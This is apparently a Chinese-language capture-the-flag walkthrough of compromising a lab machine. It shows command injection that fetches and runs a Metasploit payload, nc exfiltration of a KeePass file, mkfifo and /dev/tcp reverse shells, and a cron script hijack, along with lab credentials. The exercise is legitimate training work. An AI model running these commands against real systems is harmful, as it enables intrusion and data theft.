一:資訊收集
1:主機發現
靶機ip
10.9.23.228
2:埠掃描
nmap -A -p- -T4 10.9.23.228
上一個靶機多了個5000埠
21
22
1337
5000
7331
3:埠探測
1:21埠
anonymous
nitu:7846A$56
@nitish81299
@0xmzfr
2:1337埠
和第一個遊戲不太一樣,沒啥用
3:5000埠
被拒絕了
4:7331埠
先看看wish
同樣被拒絕
4:目錄遍歷
gobuster dir -u http://10.9.23.228:7331/ -w /usr/share/dirb/wordlists/big.txt
/robots.txt
得到一個目錄
/letshack
沒有東西,訪問最後一個
/source
下載了一個東西
像一個python指令碼,提示了5000埠加入使用者名稱和密碼
REDACTED
但是之前5000埠不能正常訪問,bp抓包修改引數
發現username欄位存在命令執行漏洞
嘗試反彈shell
二:滲透測試
1:反彈shell
msf反彈
- msfconsole
- use exploit/multi/script/web_delivery
- set target 7
- set payload linux/x64/meterpreter/reverse_tcp
- set lhost 10.9.23.112
- set SRVPORT 8081
- run
不同的版本target不同,因為8080埠讓bp佔用了,所以修改為8081
wget -qO DiykQoIe --no-check-certificate http://10.9.23.112:8081/UWJWdunqTEI; chmod +x DiykQoIe; ./DiykQoIe& disown
複製出來之後需要注意三點:
(1)不能直接全部粘上去執行,因為前面是過濾分號的
(2)傳參的地方不能直接使用空格,空格可以使用%20或者+代替
(3)下載之後需要指定路徑為tmp
wget+-qO+/tmp/DiykQoIe+--no-check-certificate+http://10.9.23.112:8081/UWJWdunqTEI
chmod+777+/tmp/DiykQoIe
/tmp/DiykQoIe
msf5成功產生seseion
sessions -i 1
升級shell
python3 -c 'import pty;pty.spawn("/bin/bash")';
蒐集資訊,在/var/backups發現有個 nitu.kdbx檔案,學習之後發現是個keepass2的檔案,keepass是個密碼管理工具,下載這個工具,檢視密碼,這裡密碼就是creds.txt裡面的7846A$56
nc接收檔案
傳送端
nc 10.9.23.112 1337 < /var/backups/nitu.kdbx -w 1
接收端
nc -lvnp 1337 > /var/backups/nitu.kdbx
用kepass開啟
得到使用者名稱和密碼
nitish
&HtMGd$LJB
2:ssh登入
ssh nitish@10.9.23.228
檢視開啟的埠服務
ss -anptl
使用nc本地連線一下,輸入賬號密碼得到內容
nc 127.0.0.1 2843
使用到第6個的時候,發現了一些資訊,似乎檢視notes的時候,會把name作為檔名cat一下
選擇5新建一個note,name設定為/etc/passwd,看看能不能讀取到內容,可以發現是能夠成功讀取到的
接著就是反彈shell,不能直接使用bash反彈,使用逆向連線指令碼 revshellgen生成payload,成功反彈shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.23.112 6666 >/tmp/f
反彈成功
在/var/mail/ugtan發現一個任務
進入到家目錄,發現best/admin/ever路徑,進入到裡面,將反彈shell一句話寫入到clean.sh,本地監聽,稍等一會(定時任務是每三分鐘執行一次)
echo "bash -i >& /dev/tcp/10.9.23.112/8888 0>&1" >clean.sh
chmod 777 clean.sh
成功反彈,執行proof.sh,滲透結束
